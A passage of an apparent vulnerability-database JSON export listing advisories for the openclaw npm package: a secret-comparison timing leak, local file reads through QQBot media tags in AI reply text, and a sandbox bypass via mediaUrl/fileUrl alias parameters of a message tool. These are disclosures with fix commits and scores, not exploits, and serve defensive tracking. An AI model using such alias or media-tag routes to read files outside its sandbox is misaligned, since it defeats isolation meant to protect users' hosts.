            "summary": "OpenClaw: Shared-secret comparison call sites leaked length information through timing\n## Summary\n\nBefore OpenClaw 2026.4.2, several shared-secret comparison call sites still used early length-mismatch checks instead of the shared fixed-length comparison helper. Those paths could leak secret-length information through measurable timing differences.\n\n## Impact\n\nThe affected paths exposed a low-severity timing side channel on secret comparison. The issue did not by itself demonstrate auth bypass, but it weakened the intended constant-time handling for shared secrets.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `be10ecef770a4654519869c3641bbb91087c8c7b` — reuse the shared secret comparison helper at affected call sites\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41407",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12878",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12844",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00041",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12883",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41407"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/be10ecef770a4654519869c3641bbb91087c8c7b",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:53:09Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/be10ecef770a4654519869c3641bbb91087c8c7b"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jj6q-rrrf-h66h",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:53:09Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jj6q-rrrf-h66h"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41407",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41407"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-timing-side-channel-in-shared-secret-comparison",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:53:09Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-timing-side-channel-in-shared-secret-comparison"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-jj6q-rrrf-h66h",
                    "reference_id": "GHSA-jj6q-rrrf-h66h",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-jj6q-rrrf-h66h"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "CVE-2026-41407",
                "GHSA-jj6q-rrrf-h66h"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-96jd-x87b-s3ey"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89964?format=api",
            "vulnerability_id": "VCID-9hcd-uj62-8yeu",
            "summary": "OpenClaw: QQBot media tags could read arbitrary local files through reply text\n## Summary\n\nQQBot media tags could read arbitrary local files through reply text.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nQQBot outbound media tags in AI reply text could reference host-local paths outside the intended media storage boundary, allowing local file disclosure through outbound media handling.\n\n## Technical Details\n\nThe fix enforces the media storage boundary for all outbound QQBot local file paths.\n\n## Fix\n\nThe issue was fixed in #63271. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `604777e4414cc3b2ff8861f18f4fb04374c702c6`\n- PR: #63271\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43533",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00059",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18803",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00064",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20219",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00064",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20258",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43533"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/604777e4414cc3b2ff8861f18f4fb04374c702c6",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:41:49Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/604777e4414cc3b2ff8861f18f4fb04374c702c6"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/63271",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/63271"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-66r7-m7xm-v49h",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:41:49Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-66r7-m7xm-v49h"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43533",
                    "reference_id": "CVE-2026-43533",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43533"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-66r7-m7xm-v49h",
                    "reference_id": "GHSA-66r7-m7xm-v49h",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-66r7-m7xm-v49h"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-local-file-read-via-qqbot-media-tags",
                    "reference_id": "openclaw-arbitrary-local-file-read-via-qqbot-media-tags",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "8.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:41:49Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-local-file-read-via-qqbot-media-tags"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-q3a2-qk5j-1yat"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"
                }
            ],
            "aliases": [
                "CVE-2026-43533",
                "GHSA-66r7-m7xm-v49h"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9hcd-uj62-8yeu"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90860?format=api",
            "vulnerability_id": "VCID-9jjv-aa8k-rke1",
            "summary": "OpenClaw's message tool media parameter bypasses tool policy filesystem isolation\n## Summary\n\nThe message tool accepted `mediaUrl` and `fileUrl` aliases without applying the same sandbox localRoots validation as the canonical media path handling.\n\n## Impact\n\nA caller constrained to sandbox media roots could read arbitrary local files by routing them through the alias parameters.\n\n## Affected Component\n\n`src/infra/outbound/message-action-params.ts, src/infra/outbound/message-action-runner.ts`\n\n## Fixed Versions\n\n- Affected: `< 2026.3.24`\n- Patched: `>= 2026.3.24`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `1d7cb6fc03` (`fix: close sandbox media root bypass for mediaUrl/fileUrl aliases`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33581",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17246",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17243",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00063",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19689",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33581"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:29:20Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/1d7cb6fc03552bbba00e7cffb3aa9741f5556416"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:29:20Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v8wv-jg3q-qwpq"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33581",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33581"
                },
                {
